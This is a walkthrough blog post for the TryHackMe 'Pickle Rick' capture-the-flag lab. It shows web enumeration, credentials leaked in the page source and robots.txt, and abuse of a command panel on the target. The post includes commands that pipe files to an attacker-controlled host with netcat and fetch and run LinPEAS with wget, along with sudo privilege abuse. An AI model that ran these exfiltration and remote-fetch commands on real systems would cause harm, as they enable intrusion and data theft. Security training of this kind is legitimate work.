CTF Walkthroughs, TryHackMe

TryHackMe – Pickle Rick Walkthrough

September 8, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Rick and Morty-themed Linux challenge that required to exploit a webserver to find 3 ingredients through local enumeration using a web console that will help Rick make his potion to transform himself back into a human from a pickle.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified two open ports: port 22 (SSH) and port 80 (HTTP), the next step will be to start enumerating HTTP.

Enumerating HTTP

The following page is displayed when accessing the web server through a browser:

When inspecting the source code of the page, a username is revealed:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

Gobuster has identified a few interesting entries, one of which is /login.php. When navigating to it a login page is displayed:

When accessing the robots.txt file, a piece of text, which later on turns out to be the password for the user found above, is found:

Authenticating to the login page using the username and password found earlier:

This takes to a “Command Panel” page, which allows to run system commands:

The next steps will be to try and identify the ingredients required in the challenge.

First Ingredient

Although the portal allows to execute Bash commands, only a limited amount of commands are allowed:

When running ls -la, a “Sup3rS3cretPicl3Ingred.txt” file is found:

When accessing it through a browser, the first ingredient is displayed:

Second Ingredient

As seen above, the current folder also contains a “clue.txt” file, which suggests looking around the file system for other ingredients:

Using find to identify the second ingredient file:

find / -name *ingredient* 2>/dev/null

A “second ingredients” file is found under /home/rick/second, when executing ls -la against the file it appears that all users can read it:

It appears that commands that allow to read the contents of files such as cat are not allowed:

Netcat could be used to send the contents of the file to the local Kali host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Running the following command to send the contents of the file to the Netcat listener:

nc 10.4.36.186 443 < '/home/rick/second ingredients'

The contents of the file containing the second ingredient were received:

Third Ingredient

Setting up a Python Simple HTTP Server to host the LinPEAS enumeration script:

Executing the following command to download WinPEAS, save it to /tmp and assign execute permissions to it:

wget 10.4.36.186/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh

The request was received:

Using the following command to execute the script and save its output to /tmp/linpeast.xt:

/tmp/linpeas.sh > /tmp/linpeas.txt

Setting a Netcat listener to receive the output of LinPEAS, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using the following command to send the output of LinPEAS to the Netcat listener:

nc 10.4.36.186 443 < /tmp/linpeas.txt

The output of the script was received on the Netcat listener:

It appears that a Sudo rule is present on the machine, that allows the current user to execute all commands as root:

Listing existing files and folders in the /root directory:

sudo ls -la /root/

A “3rd.txt” file is found, copying it to the current directory and making it world-readable:

sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt

Accessing it through a browser:

Conclusion

This was an interesting challenge as it was necessary to work around the restrictions of the web console to find and read the ingredients required through alternative commands.